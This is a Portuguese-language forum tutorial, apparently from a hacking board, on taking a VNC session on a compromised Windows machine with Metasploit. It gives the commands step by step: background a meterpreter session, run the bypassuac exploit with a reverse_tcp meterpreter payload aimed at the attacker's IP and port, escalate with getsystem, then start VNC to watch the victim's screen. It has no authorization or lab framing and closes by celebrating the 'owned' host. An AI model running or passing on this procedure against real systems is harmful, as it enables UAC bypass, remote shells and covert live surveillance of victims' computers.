Metasploit – OBTER SESSÃO VNC USANDO METASPLOIT-FRAMEWORK

Nesse tópico vou demonstrar como obter um sessão VNC em um Windows comprometido através do Metasploit-framework.
Uma sessão VNC possibilita acompanhar a tela do computador comprometido em tempo real.
Vamos partir do principio que já existe um sessão meterpreter ativa em um host comprometido.

Categorias: , , ,

Descrição

Nesse tópico vou demonstrar como obter um sessão VNC em um Windows comprometido através do Metasploit-framework.
Uma sessão VNC possibilita acompanhar a tela do computador comprometido em tempo real.
Vamos partir do principio que já existe um sessão meterpreter ativa em um host comprometido.

 

 

Image


Esse procedimento só funciona se o privilegio de acesso for de usuário Administrador, note na imagem abaixo que ao tentar realizar a escalação de privilegio, o meterpreter por si só não consegue elevar nosso acesso.

Image


Para realiza a escalação de privilegio, vou usar um exploit para burla o controle de acesso de usuários (UAC) do windows.
Coloque a sessão meterpreter em plano de fundo, procure por “bypassuac” e selecione o exploit.

Code: Select all

background
search bypassuac
use exploit/windows/local/bypassuac
Image


Verifique as opções do exploit.
Selecione o id da sessão meterpreter que esta em plano de fundo.
Selecione o payload correspondente a arquitetura do host comprometido. (x64 no caso do meu alvo)
Selecione o IP para conexão reversa.
Selecione a porta para conexão reversa.
execute o exploit.

Code: Select all

show options
set session id_da_sessao_meterpreter
set payload windows/x64/meterpreter/reverse_tcp
set lhost seu_IP
set lport sua_porta
run
Image


Apos a conclusão do exploit, uma nova sessão meterpreter com privilegio de administrador vai ser aberta.

Image


Para concluir a escalação de privilegio digite o comando como mostra o exemplo abaixo.

Code: Select all

getsystem
Image


Agora que o acesso é de Administrador, para estabelecer a sessão VNC digite o comando.

Code: Select all

bgrun vnc
Image


E ai está a sessão VNC estabelecida com o Windows ownado !!!

Image